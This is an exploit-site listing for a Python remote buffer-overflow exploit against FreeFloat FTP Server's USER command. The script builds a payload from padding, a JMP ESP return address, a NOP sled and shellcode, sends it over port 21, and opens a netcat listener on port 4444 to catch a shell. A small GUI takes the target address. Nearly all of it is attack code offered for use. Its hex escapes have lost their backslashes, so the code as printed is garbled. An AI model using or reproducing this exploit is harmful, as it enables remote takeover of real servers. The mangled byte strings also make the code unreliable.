Free Float FTP Server USER Command Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Free Float FTP Server USER Command Buffer Overflow
# Published : 2012-12-09
# Author :
# Previous Title : WordPress WP-Property PHP File Upload Vulnerability
# Next Title : HP Data Protector DtbClsLogin Buffer Overflow

#Exploit title: FreeFloat FTP Server Remote Command Execution USER Command Buffer Overflow
#Date: 06/12/2012
#Exploit Author: D35m0nd142
#Vendor Homepage: http://www.freefoat.com
#Tested on Windows XP SP3 with Ubuntu 12.04
#!/usr/bin/python
import socket,sys,time,os
import Tkinter,tkMessageBox
os.system("clear")
def exploit():
	target = ip.get()
	junk = "x41" * 230     # Offest Number --> 230
	eip = "x53x93x37x7E"  # 0x7E379353   FFE4             JMP ESP
	nops = "x90" * 20
	payload =("xb8xe9x78x9dxdbxdaxd2xd9x74x24xf4x5ex2bxc9" +
	"xb1x4fx31x46x14x83xc6x04x03x46x10x0bx8dx61" +
	"x33x42x6ex9axc4x34xe6x7fxf5x66x9cxf4xa4xb6" +
	"xd6x59x45x3dxbax49xdex33x13x7dx57xf9x45xb0" +
	"x68xccx49x1exaax4fx36x5dxffxafx07xaexf2xae" +	
	"x40xd3xfdxe2x19x9fxacx12x2dxddx6cx13xe1x69" +
	"xccx6bx84xaexb9xc1x87xfex12x5excfxe6x19x38" +
	"xf0x17xcdx5bxccx5ex7axafxa6x60xaaxfex47x53" +
	"x92xacx79x5bx1fxadxbex5cxc0xd8xb4x9ex7dxda" +
	"x0exdcx59x6fx93x46x29xd7x77x76xfex81xfcx74" +	
	"x4bxc6x5bx99x4ax0bxd0xa5xc7xaax37x2cx93x88" +
	"x93x74x47xb1x82xd0x26xcexd5xbdx97x6ax9dx2c" +
	"xc3x0cxfcx38x20x22xffxb8x2ex35x8cx8axf1xed" +
	"x1axa7x7ax2bxdcxc8x50x8bx72x37x5bxebx5bxfc" +
	"x0fxbbxf3xd5x2fx50x04xd9xe5xf6x54x75x56xb6" +	
	"x04x35x06x5ex4fxbax79x7ex70x10x0cxb9xe7x5b" +
	"xa7x44x78x33xbax46x69x98x33xa0xe3x30x12x7b" +
	"x9cxa9x3fxf7x3dx35xeax9fxdexa4x71x5fxa8xd4" +
	"x2dx08xfdx2bx24xdcx13x15x9exc2xe9xc3xd9x46" +
	"x36x30xe7x47xbbx0cxc3x57x05x8cx4fx03xd9xdb" +
	"x19xfdx9fxb5xebx57x76x69xa2x3fx0fx41x75x39" +
	"x10x8cx03xa5xa1x79x52xdax0exeex52xa3x72x8e" +
	"x9dx7ex37xbexd7x22x1ex57xbexb7x22x3ax41x62" +
	"x60x43xc2x86x19xb0xdaxe3x1cxfcx5cx18x6dx6d" +
	"x09x1exc2x8ex18")
	sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

	try:
		sock.connect((target,21))
		print "nn[-] Sending exploit ..."
		print sock.recv(2000)
		sock.send("USER "+junk+eip+nops+payload+"rn")
		sock.close()
		os.system("nc -lvp 4444")
	except:
		print "[-] Connection to "+target+" failed! n"
		sys.exit(0)


root=Tkinter.Tk()
root.geometry("%dx%d" %(700,375))
root.title("*** FreeFloat FTP Server Remote Code Execution USER Command Buffer Overflow***")
root['bg'] = 'black'
developer=Tkinter.Label(text="Developed by D35m0nd142").pack(side='bottom')
ip_answer=Tkinter.Label(text="IP Address ").pack()
ip=Tkinter.StringVar()
ip_entry=Tkinter.Entry(textvariable=ip).pack()
exploit=Tkinter.Button(text="Exploit",command=exploit).pack()
root.mainloop()